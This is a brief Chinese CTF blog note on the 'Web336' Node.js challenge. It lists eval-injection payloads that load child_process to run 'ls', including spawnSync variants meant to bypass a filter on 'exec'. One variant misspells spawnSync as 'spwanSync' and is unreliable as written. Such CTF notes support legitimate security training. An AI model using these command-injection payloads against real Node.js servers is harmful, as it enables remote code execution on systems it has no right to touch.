Nodejs-Web336
global.process.mainModule.constructor._load('child_process').execSync('ls')
eval执行代码,过滤了exec,上面的payload用不了
网上搜集的payload
require('child_process').spawnSync('ls',['./']).stdout.toString()
global.process.mainModule.constructor._load('child_process').spwanSync('ls',['.']).toString()
标签:load,Nodejs,process,global,ls,child
From: https://www.cnblogs.com/V3g3t4ble/p/17233276.html